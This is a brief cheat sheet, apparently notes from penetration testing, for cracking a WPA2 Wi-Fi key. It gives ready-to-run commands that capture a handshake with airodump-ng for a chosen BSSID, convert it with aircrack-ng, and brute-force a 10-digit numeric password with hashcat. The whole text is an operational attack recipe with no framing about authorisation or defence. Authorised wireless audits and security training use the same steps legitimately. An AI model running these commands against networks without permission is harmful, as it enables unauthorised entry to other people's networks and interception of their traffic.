WPA2 + hashcat

Write WPA2 handshake to pcap file

# airodump-ng -w /root/Desktop/wpa2handshake.cap -c 11 --bssid (bssid) wlan0mon

Use aircrack-ng to parse *.pcap file to hashcat hccap format

# aircrack-ng /root/Desktop/wpa2handshake.cap -J wpa2handshake_hashcat.hccap

You’re then prompted to choose network/SSID to parse.

Crack with hashcat. 10 chars bruteforce

# hashcat64.bin -a 3 -m 2500 -w 3 wpa2handshake_hashcat.hccap ?d?d?d?d?d?d?d?d?d?d -o WPAoutput.pot